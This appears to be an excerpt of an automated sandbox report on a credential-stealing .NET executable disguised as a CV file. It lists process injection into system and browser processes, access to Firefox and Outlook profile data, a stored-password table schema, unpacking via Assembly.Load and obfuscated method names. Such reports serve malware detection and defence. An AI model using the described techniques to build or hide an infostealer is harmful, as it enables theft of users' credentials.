            Source: Curriculum Vitae Catalina Munoz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Curriculum Vitae Catalina Munoz.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: TSTheme.exe, 0000000F.00000002.3660319790.0000000003559000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1647254707.0000000003559000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3660319790.0000000003566000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1646951828.0000000003538000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3660319790.000000000358A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Curriculum Vitae Catalina Munoz.exeReversingLabs: Detection: 63%
            Source: Curriculum Vitae Catalina Munoz.exeVirustotal: Detection: 56%
            Source: unknownProcess created: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess created: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeProcess created: C:\Windows\SysWOW64\TSTheme.exe "C:\Windows\SysWOW64\TSTheme.exe"
            Source: C:\Windows\SysWOW64\TSTheme.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess created: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"Jump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeProcess created: C:\Windows\SysWOW64\TSTheme.exe "C:\Windows\SysWOW64\TSTheme.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Curriculum Vitae Catalina Munoz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Curriculum Vitae Catalina Munoz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1377872255.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662366685.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: TSTheme.pdb source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Curriculum Vitae Catalina Munoz.exe, Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: TSTheme.pdbGCTL source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: Curriculum Vitae Catalina Munoz.exe, --.cs.Net Code: _0003
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.cs.Net Code: KJDEWMnueR System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.cs.Net Code: KJDEWMnueR System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.74e0000.4.raw.unpack, LoginForm.cs.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.cs.Net Code: KJDEWMnueR System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 0_2_07515EF3 pushfd ; retf 0_2_07515F11
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 0_2_0789171A pushfd ; ret 0_2_0789171B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 0_2_07891B2B pushfd ; ret 0_2_07891B2C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 0_2_07891AEA pushfd ; ret 0_2_07891AEB
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 0_2_078915AD pushfd ; ret 0_2_078915AE
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 0_2_07891C38 pushfd ; ret 0_2_07891C39
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 0_2_07891852 pushfd ; ret 0_2_07891853
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_00418810 push eax; ret 2_2_004188B8
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0041885E push ss; ret 2_2_0041885F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0041786E push edx; ret 2_2_004178EA
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_00417887 push edx; ret 2_2_004178EA
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_00417146 pushad ; retf 2_2_00417152
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_00401972 push esp; iretd 2_2_0040199A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_00407131 push esi; iretd 2_2_00407132
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0040D1D7 push eax; iretd 2_2_0040D1D8
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0040718E push edi; ret 2_2_00407191
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0041CB51 push eax; iretd 2_2_0041CB5F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0040735A pushfd ; retf 2_2_00407363
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_00403330 push eax; ret 2_2_00403332
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_004075C4 push es; ret 2_2_004075D6
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_00401625 push eax; iretd 2_2_0040165A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_00414765 push esp; retf 2_2_00414768
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014C225F pushad ; ret 2_2_014C27F9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014C27FA pushad ; ret 2_2_014C27F9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F09AD push ecx; mov dword ptr [esp], ecx2_2_014F09B6
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014C283D push eax; iretd 2_2_014C2858
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04B9ED9A push es; ret 14_2_04B9EDAC
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04BB0034 push ss; ret 14_2_04BB0035
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04BA49AD push eax; iretd 14_2_04BA49AE
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04BAE91C pushad ; retf 14_2_04BAE928
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04B9E907 push esi; iretd 14_2_04B9E908
            Source: Curriculum Vitae Catalina Munoz.exeStatic PE information: section name: .text entropy: 7.958472092801501
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, YcnmxKNTnXA1NqQ4lc.csHigh entropy of concatenated method names: 'EDWD1NTw1o', 'u2vDZ6gOco', 'lmTDPwdoZ0', 'pF0DNQ5L9i', 'hCXDq9XnKA', 'GnWDO96N1n', 'wnMDfMbr5G', 'GJdD8X72nq', 'GINDLuNH1Q', 't9aDlRjyx1'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, fqlC8u2Z7YhPRjbrvX.csHigh entropy of concatenated method names: 'VkR8Us0dH1', 'N9q8cVQqQU', 'wOQ86dNNm2', 's0W8jKATyK', 'MD68nPWiFE', 'WFE8v0kDB5', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, xKQ2Y9wRQSIgGWTNfR.csHigh entropy of concatenated method names: 'KRN8axy1PY', 'a0Q8sdrS68', 'CHG8Dj9Vj4', 'YwY8SCAULe', 'zUM87YOl7e', 'wKv8G6VhTo', 'csn80X7GJv', 'bpn8YE4VRu', 'kBt8HgXJSM', 'rgc8e5otpt'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, qy5p5LUNIfQKmew1rq.csHigh entropy of concatenated method names: 'UXE7RO8d2c', 'A3g7sRQ1Or', 'S1P7SidSsw', 'x5i7G0e7Xm', 'dGl70x1nRS', 'ndYSQ22rrc', 'LsDS9b0BKH', 'XnYSTmQfMO', 'YPISwKqnLn', 'ztTS2vOWpw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, qy1pqrEQ3sOEpt1qlE.csHigh entropy of concatenated method names: 'B3hyGxYXTB', 'xl3y0LAaaT', 'ATnyHXA1Nq', 'U4lyecSKVR', 'TlEyqCg8y5', 'S5LyONIfQK', 'KxOSUlpr0nrZV1sMRG', 'y85Ev9KhoPIn0pGxYK', 'aNuyyayrWo', 'LqwyIVfEmw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, MJyjJtbGp98wUACFmA.csHigh entropy of concatenated method names: 'AM9GJmwIui', 'bc0GiIMXIQ', 'rNgGWrYPop', 'eZIG1DWdDp', 'udIGKVlbnD', 'Jw5GZFwG0r', 'zE5GoYbYhG', 'E5TGPKTFZX', 'GQXGN0n35L', 'kkxGmgZvdf'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, UvteRy33KIyyiyhRJn.csHigh entropy of concatenated method names: 'r75fH9rJNN', 'ugsfeYPthf', 'ToString', 'mfrfaMc9aR', 'iGSfsce0uN', 'WxXfDSBndn', 'K1afSF3Qli', 'NgZf71WTmu', 'shHfG2XTkI', 'jAYf0Oaejm'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, FAn5GI9Cb4yvKhVofj.csHigh entropy of concatenated method names: 'OyWfwDcRQ5', 'rbmf4djM1O', 'KW38rvDUlg', 'ANM8ysFOTl', 'G84fhD97tn', 'JMZfBZh3YQ', 'RwNfVcexTW', 'iFkfnjRgEy', 'TbKfumM9D0', 'otsfppi0Ab'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, nr5UVF4misg4mgdUAT.csHigh entropy of concatenated method names: 'hf6LyS7T2Z', 'OGKLImP2eA', 'JKALEiY1jx', 'b3wLaj6bU7', 'nAwLshJicE', 'An5LShjABT', 'yBfL73trGI', 'qpN8T93O82', 'Hyg8wjPDgr', 'eay82UlxUR'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, J9gH0fkhRdxeGx8H0l.csHigh entropy of concatenated method names: 'wl8Ga3f4fx', 'fGVGDOrcwj', 'RuWG75cpIu', 'VNL74GxkhL', 'Mxm7zgTx0n', 'BQMGrAB1kI', 'v38GyWqnT4', 'yO0Gdpdd4M', 'QEPGIrhFrN', 'Q92GEetj1b'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, iKVRBkmAjnMyg3lECg.csHigh entropy of concatenated method names: 'WHZSKv33HH', 'rxmSoHL0pR', 'v0QD6WdPPO', 'S1oDjUJGvo', 'K5DDvq62xJ', 'AChDMsHPNu', 'rACDk0wbhs', 'gH3Dx9wCp2', 'nO4DbEXWU3', 'XHdDCS2cjw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, BRrrodyIpfJ2i78iZBd.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Hn0ln9m4HA', 'SotluUO4Cl', 'qp8lpSAfZx', 'eQal3diHfl', 'CADlQjkRdJ', 'JYml9gGv0N', 'yAAlTdUp1W'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, OQYqIHzI2WrTnxnHF2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RMULF0mU4s', 'A34LqTvXiH', 'fLVLOIZS3R', 'mTHLfVCpC7', 't4HL8opncR', 'urCLLmLqBE', 'YBWLlN1u43'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, BMWTCqVkjukBjFQf7X.csHigh entropy of concatenated method names: 'do4FPvEYXY', 'MT1FNbX2Pa', 'CSdFUaD4VR', 'NwcFc5oLr6', 'LmdFjsXHjo', 'LQaFv354TU', 'vusFkleL2G', 'FIAFxqycP6', 'pYlFCP0xcd', 'beDFhOsONA'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, OxYXTBPtl3LAaaTJsD.csHigh entropy of concatenated method names: 'qiEsnNLmos', 'OUjsuFLZuX', 'b16spA17UN', 'bE9s3a0CBS', 'xxssQgf7aa', 'mkqs9BL4Bu', 'qPasT3T539', 'UGlswgNXJb', 'hKAs2aCofv', 'uUYs4UVpW8'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, pwXeAKdFbkBqalm4Og.csHigh entropy of concatenated method names: 'rqKWmOsK6', 'upE1ygRjY', 'jDoZBVfO4', 'KuEoNuI4J', 'rlSNHXgf0', 'fShmaoHPl', 'KGcATmuYCWNneoNnPo', 'k7bkS21gHyNXXJB4kF', 'n6C8vaNZP', 'X2alTMvUf'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Qas3xdyra6RNyrO1vfP.csHigh entropy of concatenated method names: 'DjgLJokA79', 'KAFLiZAiJF', 'NlZLWidMy4', 'zxRL1vKMm4', 'H6oLKUm9Wg', 'x0jLZbMEhB', 'G5yLoBFpQ7', 'vtDLPH3bPm', 'rFALN0Q1MV', 'KUGLmZG6lC'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, i9NUHTnq1v8MTGavnG.csHigh entropy of concatenated method names: 'pZtqCRU0PN', 'r3DqBR737p', 'iHFqnn1uBt', 'lrMquytBk2', 'PejqcV4wIQ', 'w7Lq64LmAp', 'Bu4qj9yT6R', 'Bt2qvqpkk8', 'VfWqMFTyUL', 'hH1qkDao7f'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.csHigh entropy of concatenated method names: 's7KIR3bgyQ', 'fYXIacOyoF', 'HjfIst1RPh', 'mFEIDHBaiC', 'kF1ISjR86X', 'yGlI7QU7V0', 'uTcIGuKmkg', 'A1nI0jJwwf', 'K5PIYIRLvH', 'IiAIHOK4Cd'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, DvFq1CsmOfeYK5xheQ.csHigh entropy of concatenated method names: 'Dispose', 'HRNy2iNtIV', 'PWjdcZemIV', 'N1o55Jw110', 'QJKy4Q2Y9R', 'USIyzgGWTN', 'ProcessDialogKey', 'qRadrqlC8u', 'B7YdyhPRjb', 'avXdder5UV'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, YcnmxKNTnXA1NqQ4lc.csHigh entropy of concatenated method names: 'EDWD1NTw1o', 'u2vDZ6gOco', 'lmTDPwdoZ0', 'pF0DNQ5L9i', 'hCXDq9XnKA', 'GnWDO96N1n', 'wnMDfMbr5G', 'GJdD8X72nq', 'GINDLuNH1Q', 't9aDlRjyx1'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, fqlC8u2Z7YhPRjbrvX.csHigh entropy of concatenated method names: 'VkR8Us0dH1', 'N9q8cVQqQU', 'wOQ86dNNm2', 's0W8jKATyK', 'MD68nPWiFE', 'WFE8v0kDB5', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, xKQ2Y9wRQSIgGWTNfR.csHigh entropy of concatenated method names: 'KRN8axy1PY', 'a0Q8sdrS68', 'CHG8Dj9Vj4', 'YwY8SCAULe', 'zUM87YOl7e', 'wKv8G6VhTo', 'csn80X7GJv', 'bpn8YE4VRu', 'kBt8HgXJSM', 'rgc8e5otpt'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, qy5p5LUNIfQKmew1rq.csHigh entropy of concatenated method names: 'UXE7RO8d2c', 'A3g7sRQ1Or', 'S1P7SidSsw', 'x5i7G0e7Xm', 'dGl70x1nRS', 'ndYSQ22rrc', 'LsDS9b0BKH', 'XnYSTmQfMO', 'YPISwKqnLn', 'ztTS2vOWpw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, qy1pqrEQ3sOEpt1qlE.csHigh entropy of concatenated method names: 'B3hyGxYXTB', 'xl3y0LAaaT', 'ATnyHXA1Nq', 'U4lyecSKVR', 'TlEyqCg8y5', 'S5LyONIfQK', 'KxOSUlpr0nrZV1sMRG', 'y85Ev9KhoPIn0pGxYK', 'aNuyyayrWo', 'LqwyIVfEmw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, MJyjJtbGp98wUACFmA.csHigh entropy of concatenated method names: 'AM9GJmwIui', 'bc0GiIMXIQ', 'rNgGWrYPop', 'eZIG1DWdDp', 'udIGKVlbnD', 'Jw5GZFwG0r', 'zE5GoYbYhG', 'E5TGPKTFZX', 'GQXGN0n35L', 'kkxGmgZvdf'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, UvteRy33KIyyiyhRJn.csHigh entropy of concatenated method names: 'r75fH9rJNN', 'ugsfeYPthf', 'ToString', 'mfrfaMc9aR', 'iGSfsce0uN', 'WxXfDSBndn', 'K1afSF3Qli', 'NgZf71WTmu', 'shHfG2XTkI', 'jAYf0Oaejm'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, FAn5GI9Cb4yvKhVofj.csHigh entropy of concatenated method names: 'OyWfwDcRQ5', 'rbmf4djM1O', 'KW38rvDUlg', 'ANM8ysFOTl', 'G84fhD97tn', 'JMZfBZh3YQ', 'RwNfVcexTW', 'iFkfnjRgEy', 'TbKfumM9D0', 'otsfppi0Ab'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, nr5UVF4misg4mgdUAT.csHigh entropy of concatenated method names: 'hf6LyS7T2Z', 'OGKLImP2eA', 'JKALEiY1jx', 'b3wLaj6bU7', 'nAwLshJicE', 'An5LShjABT', 'yBfL73trGI', 'qpN8T93O82', 'Hyg8wjPDgr', 'eay82UlxUR'
